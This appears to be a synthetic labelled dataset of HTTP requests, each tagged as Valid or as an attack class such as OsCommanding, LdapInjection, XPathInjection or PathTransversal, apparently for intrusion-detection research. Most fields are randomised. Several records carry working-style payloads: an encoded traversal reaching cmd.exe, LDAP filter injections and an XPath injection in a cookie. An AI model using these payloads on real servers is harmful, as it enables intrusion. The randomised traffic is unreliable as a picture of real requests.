Proxy-Authorization: 5npa6j mylninz=urin
Authorization: geiut9 oDhfcae=4gafitu
Range: 826738-,52-
Referer: http://www.Bdf2m.fr/nLtolssc/moluo/ihZlyndt/hiey.exe
TE: trailers,deflate;q=0.0,gzip
Trailer: Host
User-Agent: Mozilla/5.4 (Windows; U; WinNT 7.8; ac-sJ; rv:8.0.9) Gecko/85743613
UA-CPU: x86
UA-Disp: 372,7869,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 499x6450
Via: HTTP/2.3 90.146.211.217, 2.8 www.e7td.tiff, 7.7 www.nttoj3ks.jpeg
Transfer-Encoding: gzip
Upgrade: CeaT/1.3, qaai/6.4, iJd4/5.3
Warning: 669 www.rwxis.jpg:6311 "6cpttbsraneoe" 
X-Forwarded-For: 173.221.98.4
X-Serial-Number: 68893779
----: -------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 11753
Start - Id: 22254
class: Valid
GET /iept0eo0hnstoherurd/leern5to/aes3tenisaino/dMx6He/tZ4N7/qM.php4?3t9sniceeurda1o=loP0%2Bp%3Ag0+ HTTP/1.0
Host: www.eIdi.uk
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: compress, gzip, compress;q=0.4, gzip, compress
Accept-Language: iset-tos1mcNr, thuut-80inn;q=0.0, 7-odoeuitc;q=0.2, ii-aD;q=0.4, nmipo-btAgy
Cache-Control: only-if-cached
Client-ip: 62.159.240.239
Cookie: Ow.uEs.q= h;oSrEjnn3s=13565019;nasaLsxnns0lai8=t;Msecoolt3M=Reibodyraccept $aftp-0a;id-;hf7ilndRdyce=Rnel3T;oe=adpa rx
Cookie2: $Version="6"
Date: Sun, 02 May 04 17:03:37 UTC
ETag: W/"mTPGsM5liPmK3wm"
Expect: 100-continue
From: orEtts@ismhaeter.de
If-Modified-Since: Sun, 31 May 09 04:49:31 GMT
If-Unmodified-Since: Wed, 24 Jan 07 11:43:47 CET
If-Match: *
If-None-Match: *
If-Range: "mVPU@8AFrXYS76X9"
Max-Forwards: 3
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: ngoFt8 taaec=t7nymEoi
Authorization: Digest opaque="oWtn"
Range: 00-
Referer: http://www.Shce.org/oukq/sfhA2/rEasan5u/fenct8.asp
TE: deflate;q=0.7
Trailer: Warning
User-Agent: ietei/7.2
UA-CPU: MIPS
UA-Disp: 204,827,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 196x167
Via: 5.4 52.233.71.226, FTP/4.7 55.166.43.74
Transfer-Encoding: gzip
Upgrade: ktl/3.4
Warning: 047 www.paolls.html "neige1nwahS5sseaami" 
X-Forwarded-For: 204.223.4.134
X-Serial-Number: 35178476793
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22254
Start - Id: 43872
class: OsCommanding
GET /scripts/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 222.72.2.100
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1254;q=0.9, iso-8859-7;q=0.3, windows-1253;q=0.5
Accept-Encoding: deflate;q=0.4, deflate;q=0.7
Accept-Language: Egje-mitisns;q=0.3, 4deT-creulN;q=0.0, uyna-sen9n1s;q=0.2
Cache-Control: max-age=63
Client-ip: 132.134.82.134
Cookie: fihMateayhssdt=939
Cookie2: $Version="4"
Date: Sat, 18 Jul 09 24:45:44 CET
ETag: "4p2ZiLBnvJxcMOdpmaxa"
Expect: aael=eeIlcr
From: nxa0tn0@Cododus.net
If-Modified-Since: Mon, 16 Jan 06 22:22:18 GMT
If-Unmodified-Since: Sun, 25 Sep 05 05:41:40 GMT
If-Match: "t-nu44CIJ9zpgSAjN0t"
If-None-Match: "2tQcTKqYyF0azjzu"
If-Range: Sun, 07 Aug 05 24:59:34 CET
Max-Forwards: 1
MIME-Version: 1.9
Pragma: fAttmFml='s4a'
Proxy-Authorization: Digest uri=/uiers/ieatYM/iCiR.tiff
Authorization: lSOune xeikcnEt=6xsrh
Range: 17-,-8
Referer: /s9eret/hdru0au/iOiiyawr/t6Oc3/aeic.css
TE: trailers,trailers,trailers
Trailer: Accept-Language
User-Agent: Mozilla/4.9 (Machintosh; U; PPC 0.1; te-da; rv:5.5.3) Gecko/04584010
UA-CPU: Sparc
UA-Disp: 7852,060,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 629x1097
Via: FTP/1.6 238.1.243.165, 9.9 185.157.151.121
Transfer-Encoding: 1qsm; vrjcoda9=adoeErc7
Upgrade: 0a7on5/8.8, emazee/1.9, 1hodgr/0.0, auiinp/3.7
Warning: 631 234.108.10.201:870 "l05cl4bnf" "Sat, 24 Jan 04 23:46:55 UTC"
X-Forwarded-For: 160.49.9.9
X-Serial-Number: 42257
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43872
Start - Id: 38409
class: LdapInjection
GET /il8/li_8krJH9/obs0/adPpF..C.USStNq/letrhjfenteo/O4c3@9RQbin3cvs/loatgaw.jpg?lcheotex2nsoose=73480&hnnste=4&eodtnacdjmemnIe=haACtBAG&GftziIefdrseowu=euidT-Tsh&sarr3rfntr=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&amejeswttyd=g HTTP/1.0
Host: 121.221.249.48:80
Connection: keep-alive
Accept: image/jpeg, video/quicktime;q=0.0
Accept-Charset: windows-874;q=0.3
Accept-Encoding: deflate, identity, identity;q=0.3, deflate
Accept-Language: *;q=0.8
Cache-Control: max-stale=23
Client-ip: 167.68.68.243
Cookie: tcfeis47d=noeiG;9eto0=Renbc9;rrmOcedkautD8=me9awls;gMobject5oXR0HR=Oro;autEtaHtynnM2oe=edFz9ahndnem5h;B0wh2kscywttdc=eeb
Cookie2: $Version="47"
Date: Sat, 31 Mar 07 13:35:48 GMT
ETag: W/"Ua58.q2KdSq-9XVw"
Expect: c2dEa
From: uftet9d@Engnam.uk
If-Modified-Since: Sun, 01 Feb 09 16:32:11 UTC
If-Unmodified-Since: Sat, 12 Mar 05 03:51:09 UTC
If-Match: *
If-None-Match: *
If-Range: "-TG6qbEQt@McZzkKl@IQ"
Max-Forwards: 617
MIME-Version: 0.1
Pragma: no-cache
Proxy-Authorization: h80n hmasNo=a0xee
Authorization: NTLM ZWhjOXhiaWlzZ3djbmFlbElBZXJ4ZUdvOUVkZXN4ZWllMnd0dG5uemVibHV3Yw==
Range: -96373
Referer: http://www.HysonrL.com/oises/aicS/mty8l/gTdehe.jsp
TE: gzip;q=0.0,deflate;q=0.5
Trailer: Max-Forwards
User-Agent: Mozilla/4.8 (X11; U; Linux i386 7.1; ec-6i; rv:0.5.3) Gecko/66972637
UA-CPU: MIPS
UA-Disp: 2631,041,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 7262x7113
Via: 2.3 www.nnm7tk.jpg:51, HTTP/2.6 51.101.238.227, FTP/6.3 156.249.199.208:5
Transfer-Encoding: gzip
Upgrade: Elgm/6.3, hea/6.4, She/5.1, dol/2.2
Warning: 498 www.qbdd.css:76 "iEsitooO9Eeo" "Mon, 07 Mar 05 03:32:44 UTC"
X-Forwarded-For: 139.160.46.245
X-Serial-Number: 8565701730547644653
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38409
Start - Id: 7458
class: Valid
POST /f9L3qF/rouso5Kituljn/M-C34HVEU1/BPXscript85zm1selectcdW/sY2S/a2vWT_w6G/ZR_KzLXj/rhaoG6w1HyNMrkc/v9/lOKC6DSF6fkW5VMWuT@V/wAy/pih8T7J.js? HTTP/1.0
Content-Length: 62
Content-Language: e
Content-Encoding: identity
Content-Location: /dalrh/Svwo/oarn/mcce4/lrsahE.bin
Content-MD5: dGNpZ3RBb3draW5tbGU5Mg==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 25 Jul 04 23:00:29 CET
Last-Modified: Sat, 08 Dec 07 17:48:00 UTC
Host: www.na9osoone5.be
Connection: close
Accept: application/*;q=0.3, text/xml, text/xml;q=0.8
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: only-if-cached
Client-ip: 102.96.206.19
Cookie: retemstasiu=7194801;fap=995634;eisqomle=oRa;rjtahtkhaNiesio=s-@Hs
Cookie2: $Version="398"
Date: Tue, 21 Jul 09 09:01:22 GMT
ETag: "U27iRbztriZOFG-n"
Expect: 100-continue
From: haIOel@eOte.be
If-Modified-Since: Fri, 30 Apr 10 03:06:41 CET
If-Unmodified-Since: Sat, 17 Dec 05 15:15:19 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 7
MIME-Version: 9.0
Pragma: no-cache
Proxy-Authorization: Basic bHN2ZGE2YTpzZVllYWdu
Authorization: Basic ZHJudzpub3dhNA==
Range: 95-162886,848657-426532
Referer: /adpe2/04addcen.fgf
TE: gzip
Trailer: Cache-Control
User-Agent: Mozilla/2.6 (compatible; Konqueror/1.4; Win98; phe9toeju)
UA-CPU: PowerPC
UA-Disp: 634,725,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 7331x9166
Via: 6.3 www.atdidest.js
Transfer-Encoding: deflate
Upgrade: aelor4/7.1
Warning: 422 www.rinltnh.jpeg "aiAkn" 
X-Forwarded-For: 46.39.95.124
X-Serial-Number: 408880682973
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ds=l) :n&tten=NhnleueAtnh-R&e2=e1Nt7OTf&rolBomswe2oeai=rVo

End - Id: 7458
Start - Id: 37811
class: LdapInjection
GET /vejeoolnsynurs/h8ko0rmD-NNoDCz1/d-hmtZnES5s/nn/yhsaisl/0rwPMR-/jDnw0gK5EH/on9daidoattgli5ts/dropvk.jpeg?9Ye8=%2Bpe0dhiidrm&ldpaeou=Ovde0P0oliepa&wa0eemhwaeu=rofA%29%28++%7C++%28in27%3D*%29&l2gsI=2vp&onnfg=tFKh8quYsZ&eeihrlcewhn=4etmpjonrwo&gc4onnEmo=27520&10nYu=22533795 HTTP/1.1
Host: 135.79.51.129
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-chinesetrad;q=0.5, windows-1255;q=0.4, windows-1255, iso-8859-6, cp-936;q=0.1
Accept-Encoding: identity, deflate;q=0.5, identity;q=0.9, gzip;q=0.1
Accept-Language: *
Cache-Control: ddc4ht=eo
Client-ip: 172.140.190.216
Cookie: oeiBmt=hdivib;spnrdb=1r;wjd6Z=0;si=ta
Cookie2: $Version="55"
Date: Sat, 08 Nov 08 16:10:19 GMT
ETag: W/"73onUuR9.zMCXKlol1M"
Expect: asc8a
From: eiuLl1hr@buwsjfa.cz
If-Modified-Since: Sun, 20 Nov 05 20:20:41 GMT
If-Unmodified-Since: Thu, 23 Apr 09 17:17:29 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 22 Dec 07 24:10:43 GMT
Max-Forwards: 534
MIME-Version: 0.8
Pragma: no-cache
Proxy-Authorization: Basic bmVvdDZzOndpdGNvcQ==
Authorization: NTLM Y25lbzZyaExzNm50cnVvSGk3c2lwZXRUdThlVDJhc1NjaUVsZXZ4bmhlb2E=
Range: 3012-675
Referer: /0Ezoy.sh
TE: gzip,gzip;q=0.6,gzip
Trailer: Connection
User-Agent: Mozilla/2.7 (Machintosh; U; PPC 4.6; oT-tO; rv:7.6.5) Gecko/96898917
UA-CPU: x86
UA-Disp: 3820,0444,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 2010x029
Via: 7.1 www.dsotcea.tiff, 2.0 5.236.158.57
Transfer-Encoding: identity
Upgrade: ziaeo/3.7, fyav/7.8, dpa0ed/1.0, mfirt/0.2, pSli/6.6
Warning: 129 www.uqhu9nc.htm "laft4oha" 
X-Forwarded-For: 66.215.97.109
X-Serial-Number: 9737658238850824210
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37811
Start - Id: 1106
class: Valid
GET /3ia9uohelly/aeSZrMfgCIC@xVlj/ew-ic70uka.q1vbh/e4pB8maGCA0Lg/bh8aautoexecJ-libSzffQ9/QMqhtaccesaH7AVinputhaving/sunionKu1fv2Axp_.htm?aesToe=926722825&8CNtnHeQ=w2&veylienlAHoda=i4oV_r.o HTTP/1.0
Host: 83.59.169.70
Connection: close
Accept: image/png, video/*
Accept-Charset: *
Accept-Encoding: deflate, gzip;q=0.0
Accept-Language: *
Cache-Control: max-age=32806
Client-ip: 249.26.84.16
Cookie: ia3iih7heg1oD=a.NEQZqi;tEmte=590;lxs=986
Cookie2: $Version="48"
Date: Thu, 04 Feb 10 22:42:15 UTC
ETag: W/"CLMnrtpnGcA_ZQp"
Expect: 100-continue
From: hsrtboi@onni.cz
If-Modified-Since: Sun, 03 Aug 08 07:09:46 UTC
If-Unmodified-Since: Wed, 19 Sep 07 18:45:22 UTC
If-Match: *
If-None-Match: "2rF-p_JGO5oas.sKpa"
If-Range: *
Max-Forwards: 42
MIME-Version: 9.6
Pragma: aee49rz='xauenel'
Proxy-Authorization: NTLM c3RlY1JudGlvYmVpdGVhcWVkaUVkdHRobnJxZGVtcnRiaW5jaDJkTG90Mg==
Authorization: Basic aXNldHhuanM6bDBoMXNmdQ==
Range: 634551-,48052-6687,-9
Referer: http://raguT.de/nham/uno9/rseliN/hwhfeoh.asp
TE: trailers,gzip;q=0.4,trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/6.5 (Machintosh; U; PPC 2.8; Ot-tl; rv:1.1.8) Gecko/16745376
UA-CPU: 68000
UA-Disp: 4228,5087,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 8837x3320
Via: 0.8 www.arowo.htm, 2.9 www.dume.js, 9.4 www.trp9esd.shtml
Transfer-Encoding: deflate
Upgrade: cMgino/5.9, daaYi4/9.7
Warning: 392 www.m2hZnz.tiff "idliSa9nioaswwetlp" "Thu, 02 Sep 04 23:56:20 CET"
X-Forwarded-For: 36.96.25.139
X-Serial-Number: 627934
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1106
Start - Id: 32323
class: Valid
GET /heOOQUzT9w4ltAV/AKsWBskXEaaJQU@/eqogesnussmn/rNtOcOHMK/etaeqat/sR/wx-3.asmx?rWXR7PZkx=sme5t&rn08nilecaete=ecioear9&n3iImasto72mM=0704477924&iGWo0amr=tSIRO HTTP/1.0
Host: 111.146.54.122:80
Connection: close
Accept: text/*, audio/*
Accept-Charset: *
Accept-Encoding: *;q=0.0
Accept-Language: L-84;q=0.5, ro-aernef;q=0.8, ojqco-eetib;q=0.7, zufM9oz-eor2, cianad-tce
Cache-Control: min-fresh=07
Client-ip: 155.74.53.10
Cookie: nhpaw=roeUrDorsdor1abg7;fNi@mlog=454943193
Cookie2: $Version="9"
Date: Mon, 14 Jul 08 07:11:23 UTC
ETag: "Kao7k1nsmjJ0uba"
Expect: 100-continue
From: uoia@eenManS.fr
If-Modified-Since: Tue, 08 Jun 04 20:11:11 UTC
If-Unmodified-Since: Fri, 12 May 06 01:15:26 UTC
If-Match: "sO-Hjpx9sJc2LcM7vl"
If-None-Match: "mMitNRp3Pz237K5"
If-Range: "FM6b5OzTJZdFxxGaWiV_"
Max-Forwards: 9
MIME-Version: 1.0
Pragma: no-cache
Proxy-Authorization: Digest response="22F540Ff1cB74c8F64522Ac09e9adb6F"
Authorization: Basic NmxpRnJkbDplQWU2
Range: 2-941553
Referer: /taihtd/roeo/cn8iLa/nUcn2.jpg
TE: gzip;q=0.0
Trailer: Accept-Language
User-Agent: Mozilla/8.8 (compatible; Konqueror/8.1; Win98; 1ne34Nwnsd; h2cdwsssm)
UA-CPU: StrongARM
UA-Disp: 0557,8161,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 831x847
Via: 8.2 www.tvmd.css, 2.4 www.s1a3yot.htm, oeia/8.4 www.bqnbel.png
Transfer-Encoding: deflate
Upgrade: gETaD/6.4, von/5.0, mwsig/3.5
Warning: 007 www.rlynhI0s.htm "stzsletotoM5len" "Thu, 03 Jul 08 20:03:46 CET"
X-Forwarded-For: 132.144.23.218
X-Serial-Number: 454901
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 32323
Start - Id: 22105
class: Valid
GET /hJu@1WHx/ps0tOI2_usrstdinPjWPR/a7Eia8oysulahetoaler/jELnrICLgO/53e5sIP.php4?ewliao=07840479&sEajlAatdt0=262&vzwp-q=esng&odh=r0ectr2odlpleXp&rbooaD=Odescriptpe++n&ktrtaptnrn4eLh=517&t7=EtErea17nHunsa&c6itn4f=ttebco+rc+dotbOchild+delete&ua3mnyh=+%2B&msnS=tAtcnhf&pS=%5Dhtn&eemnno=owoktooss%2Beem&rElijoxvlieae=gSuF2_aBG5.&xnaneee=uYS HTTP/1.1
Host: 158.105.117.254
Connection: keep-alive
Accept: image/gif;q=0.3
Accept-Charset: x-mac-icelandic;q=0.2, x-mac-greek
Accept-Encoding: *;q=0.3
Accept-Language: ixi-eeeh
Cache-Control: qmemuga=tp5f
Client-ip: 203.16.208.96
Cookie: vClnodeL= tetFi;._IU=);T3W1V=a0nihd4;miesiaus3rce=rj9h3QRqc
Cookie2: $Version="5"
Date: Sun, 30 Nov 08 24:17:19 UTC
ETag: "LacjLBXku.K2a0kE9RB"
Expect: raried
From: dren@Ttoersyr6.com
If-Modified-Since: Fri, 07 Dec 07 08:51:36 GMT
If-Unmodified-Since: Wed, 29 Apr 09 07:11:30 CET
If-Match: *
If-None-Match: *
If-Range: Thu, 01 Oct 09 15:56:32 UTC
Max-Forwards: 0
MIME-Version: 0.2
Pragma: no-cache
Proxy-Authorization: Basic aWFydHA6ZmVjaWM=
Authorization: Basic aWlvaDowYWRo
Range: -212,11-,-0
Referer: /tpttztae.nsf
TE: trailers,deflate;q=0.0
Trailer: Proxy-Authorization
User-Agent: Mozilla/0.8 (Windows; U; Win98 1.7; un-5r; rv:6.5.4) Gecko/57765817
UA-CPU: PowerPC
UA-Disp: 1342,370,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 8724x0388
Via: 6.4 17.74.34.133, 8.9 107.172.180.50, HTTP/4.5 245.221.253.150
Transfer-Encoding: deflate
Upgrade: sdqs/1.2, otap/2.3, suO/8.6, t03/1.8
Warning: 536 162.78.197.155:33480 "iebaetgd" "Tue, 25 Oct 05 10:31:53 GMT"
X-Forwarded-For: 72.161.125.176
X-Serial-Number: 42920569636252963929
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22105
Start - Id: 48413
class: XPathInjection
GET /qi8cNhrt9h3uieyogej/a85feqyjeewlnpetsg/connectOEautoexecLEinrpZOV9/chmTW6/chO_3eVhs6Y/hercIsal9ar/aPRSZVuzkHjWDQwziJ/childyGnFSidHgK/alXRflDADW/5jas@k87Cdd/xyO-exec/oosrspha.jpg?tpp7ne3e=un0a&6NFgcat-YqjIJ=846&DagHiHm6TaCatcl=67151&Sh=qlibtnoDA-el&et=edrqnte&j2-GDDe@7Z=517&dc=783820&stUnljessos9gex=no&eisgwnOdsbd=237&retavetjFefe=mailh%7Cnn&tat1ngwaenmp=hLQiXf5XP HTTP/1.0
Host: www.eidieteHyt.biz
Connection: iitff
Accept: audio/basic, application/zip;q=0.5, audio/*;q=0.3
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: oraamn-srs;q=0.7, hO-eob;q=0.4, chRu-nouo;q=0.6, 14pie-lnatp6;q=0.6
Cache-Control: min-fresh=01828
Client-ip: 147.153.164.2
Cookie: Rehhrr8s=rti']     |   P   |   //user[   name/text(  )    =  '5gqAH;doeeifuttdm=0608;sybcettHevh=eheu;l1nIunhenrsnn=960746112
Cookie2: $Version="817"
Date: Mon, 18 Jul 05 21:20:38 GMT
ETag: ".Lj17Nox0S6eIS0"
Expect: 100-continue
From: wem8si@ltOhb.biz
If-Modified-Since: Sun, 19 Apr 09 17:28:25 CET
If-Unmodified-Since: Thu, 12 Apr 07 05:16:50 UTC
If-Match: "c6L8q1LfE6xocrqcL8t"
If-None-Match: *
If-Range: "xwG0A75a5ITs38AhbZ"
Max-Forwards: 141
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: Digest opaque="uacst"
Authorization: ttesae ne3y=apn2ncs
Range: 35471-
Referer: /aax9/Htieuimo/l1winiuy.txt
TE: trailers,trailers
Trailer: Via
User-Agent: sltt3t
UA-CPU: PowerPC
UA-Disp: 213,9851,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 0994x095
Via: tttm/1.0 207.142.150.59:174, d9i/2.0 186.54.79.65:79
Transfer-Encoding: identity
Upgrade: nea/7.4, eNt/9.7, lsi/6.2, 2El/8.5, hravyc/9.6
Warning: 422 38.9.144.12 "Cneu9tLinajE" "Sun, 06 Apr 08 02:33:09 GMT"
X-Forwarded-For: 200.45.80.130
X-Serial-Number: 86756657363
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48413
Start - Id: 1924
class: Valid
GET /9mail/rTxM-nY.paPO1fof/8gd7h/ePeeUImvf3eW5/un/niWLdri4eE8d/inputqhttpYZvsystemscriptfb/8We6KC/GdIelXi/4n_.7l38vQd/3pz@LEGSt51.php4? HTTP/1.0
Host: 136.210.164.100
Connection: ele6e5
Accept: video/*
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: *
Cache-Control: on=Ue6pe
Client-ip: 252.237.130.26
Cookie: 4babtu06kaoeu=3496671853;hs=ls(NclatreA=bruimgsiauH;mnelc3=isoo8bede;7aEFdocumentS6-Umj=u;efd34Enno=oUte?tdugk1t
Cookie2: $Version="775"
Date: Sun, 07 Aug 05 17:10:52 UTC
ETag: "N7m6QVXHgIOiHQEzH"
Expect: 100-continue
From: sliheOFe@oSenphus.it
If-Modified-Since: Tue, 12 Jan 10 07:36:33 CET
If-Unmodified-Since: Sat, 12 Aug 06 17:34:46 UTC
If-Match: "5O6f.eWI.7ywAh12"
If-None-Match: *
If-Range: Tue, 05 May 09 09:35:25 UTC
Max-Forwards: 80
MIME-Version: 5.4
Pragma: no-cache
Proxy-Authorization: Basic d0NpYjlsZTo2b2dxbnRl
Authorization: Digest opaque="eDhdEsoa"
Range: -8,9401-9800,-599
Referer: http://www.nlalthsr.net/eahaeii/0tNat3/oMdeiaS/7gr9ene/ils7Il.pdf
TE: trailers
Trailer: Authorization
User-Agent: Mozilla/1.5 (compatible; Konqueror/8.3; Windows NT; eAtik; 9zrgnltsh; ermsreoH)
UA-CPU: PowerPC
UA-Disp: 2183,5316,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 594x6031
Via: HTTP/0.3 0.82.102.123, tod/7.9 143.58.77.58
Transfer-Encoding: identity
Upgrade: fr1/3.0
Warning: 335 124.7.71.254:492 "wCaa" 
X-Forwarded-For: 204.164.3.151
X-Serial-Number: 539815603365
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1924
Start - Id: 46014
class: PathTransversal
POST /6h9Hc/hTCn/t8eG08tFINTLEO3MExDZ.cgi? HTTP/1.0
Content-Length: 172
Content-Language: cJdh
Content-Encoding: compress
Content-Location: http://www.0tmrsx.gov/snnah7/ebrscerI/Nnbc.sh
Content-MD5: OWRodGxzc0xJbXNiaGV0YQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 23 Feb 04 09:43:01 UTC
Last-Modified: Sun, 15 Jul 07 24:54:55 UTC
Host: www.ssma3a.de
Connection: close
Accept: video/*, video/quicktime;q=0.1
Accept-Charset: ks_c_5601-1987;q=0.2, x-mac-chinesesimp;q=0.4, x-mac-greek, iso-8859-1;q=0.5, euc-jp
Accept-Encoding: 
Accept-Language: eeulsv9-pnodt;q=0.5, j-i;q=0.8, h-y, u-01eB4ldt;q=0.5, nofihbr-iAdt
Cache-Control: no-transform
Client-ip: 33.75.101.32
Cookie: iceRar0ai9he=teioo;nnw=d:\autoexec.bat
Cookie2: $Version="49"
Date: Mon, 31 May 04 19:48:26 UTC
ETag: "eO1Ccbc.Nt5b9d2EP3tV"
Expect: 100-continue
From: t2ady@EsdaVe.ch
If-Modified-Since: Sat, 22 May 04 07:34:23 UTC
If-Unmodified-Since: Mon, 19 Nov 07 23:23:55 UTC
If-Match: *
If-None-Match: *
If-Range: "edMpdWHs9l3ANOkn6"
Max-Forwards: 57
MIME-Version: 8.1
Pragma: no-cache
Proxy-Authorization: NTLM aWllclB0eGFxaWJjbnllbHR0ZTdlNjVkM2VlaTNzdHR1dHRp
Authorization: Digest realm
Referer: /qanauym/chos.mpeg
TE: gzip;q=0.9,trailers,deflate;q=0.9
Trailer: If-Unmodified-Since
User-Agent: ne2.Al http://www.nliMdo.gov
UA-Disp: 6568,132,8
UA-Pixels: 9947x253
Via: HTTP/3.3 206.40.141.236, 7.0 www.q8aenZ.jpeg
Transfer-Encoding: gzip
Upgrade: aestt/6.7, tdau/4.0
X-Forwarded-For: 150.199.183.225
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Sfuaet=rew&beAdtsneii=673894426&hx=r=anQarhthcddtl&alWxmAIH=8003009&t8Dsnrte=69038&mjtjviema=)s&do&rm=275009&g80q=ct@1Cq2Zx&norbrlliuh1e=601421477&nfnph-2=benyihome

End - Id: 46014
Start - Id: 37598
class: LdapInjection
PUT /t5jIJT7cqPHGZqvw5r/oloiel.jpeg? HTTP/1.1
Content-Length: 192
Content-Language: otG
Content-Encoding: identity
Content-Location: http://www.sjpholee.com/tsapwy/I9i4s/ilaa/iuTa/honii.jsp
Content-MD5: aW9vQWdvam85ZWVmZGVocw==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 24 Oct 05 15:41:05 UTC
Last-Modified: Wed, 28 Nov 07 24:19:54 CET
Host: www.astaite.fr:8633
Connection: close
Accept: video/quicktime;q=0.9, audio/*, audio/basic
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 99.181.231.1
Cookie: V@K@4RE.H=8ZF
Cookie2: $Version="063"
Date: Fri, 21 Jan 05 03:44:12 GMT
ETag: "@QX@_ywUL101QKMd"
Expect: 100-continue
From: atns@eiaaaj.fr
If-Modified-Since: Sat, 09 Jul 05 08:39:11 GMT
If-Unmodified-Since: Sun, 02 Dec 07 11:15:13 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 21
MIME-Version: 4.3
Pragma: no-cache
Proxy-Authorization: Digest username="chiw"
Authorization: E0D6 toUen=M8keim
Range: 2-4,-9680
Referer: http://wnpft.fr/siaa/wtasuoL/E3ks/qbfaawot.rar
TE: deflate;q=0.6,chunked
Trailer: Accept-Language
User-Agent: j6aoihiItw
UA-CPU: PowerPC
UA-Disp: 752,1342,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 770x317
Via: HTTP/6.6 5.56.156.91
Transfer-Encoding: deflate
Upgrade: vYs/1.2
Warning: 943 www.FaAepr.shtml "i9ws4h7nus" 
X-Forwarded-For: 105.35.228.101
X-Serial-Number: 35061677814454
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

tUehg7e=mexecu+n&huey=3r&Eegdyezi=583&execQhwLGINM==acS1ef3&snt0ir=ietc]6ool0?En0rbee&eohohAk=9&pK2Zx7=21)(&(objectClass=nerd)(|(sn =   8Yc)(cn=erx   J*))

End - Id: 37598
Start - Id: 12117
class: Valid
GET /A2RVm/Osttenhke0te3/aGG.F3YQvAnjU/6e/afW8e7MZc5yL8Ht.33jQ/bp92ZgEdK/a8J95XKT0vfh/nVHlJi7pQQDQIZU0AqNb.css?T2ofQ6=fotyepbheita&rg=aTwF7MeTt&a0C=1ZA8QfJ9q5Q&sorsETreneld9e=isdmt2hees HTTP/1.1
Host: 51.38.233.52
Connection: nia3aa
Accept: audio/*;q=0.2
Accept-Charset: *
Accept-Encoding: 
Accept-Language: rex-enp3;q=0.0, oes-peh5n;q=0.8, st-TinroRe, iHs-itmtet;q=0.6
Cache-Control: only-if-cached
Client-ip: 92.187.253.162
Cookie: nsm079=347949;aelqE96lsseonbe=hmia:scriptf/=\=ree g 
Cookie2: $Version="66"
Date: Thu, 04 Nov 04 11:22:11 CET
ETag: W/"m4kMhaJSuJn1SXDt9"
Expect: umooxwre
From: kI9adwt@efwp.ch
If-Modified-Since: Wed, 16 Nov 05 20:51:50 GMT
If-Unmodified-Since: Thu, 06 May 04 03:55:00 GMT
If-Match: "EFF6tk.A8.T8k_0u6n"
If-None-Match: *
If-Range: Sun, 08 Mar 09 09:23:03 UTC
Max-Forwards: 717
MIME-Version: 9.6
Pragma: no-cache
Proxy-Authorization: Basic bmx6dGVoOm9BYWRp
Authorization: NTLM NmltbTNnbmU0YXRnZm9mdHJ0bG9zaW5kcjZMYTBBNm9kT2llaW9zb3NhZWVwb2M5
Range: 4007-96041,-63
Referer: /abatogh/taet/sytse.mp3
TE: trailers
Trailer: Trailer
User-Agent: rShttaan
UA-CPU: x86
UA-Disp: 3494,5887,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 556x8407
Via: FTP/9.7 www.Nq7tmrn.shtml, 7.5 www.ahic6o.gif, FTP/9.4 49.62.119.58:9
Transfer-Encoding: 3o6Ob
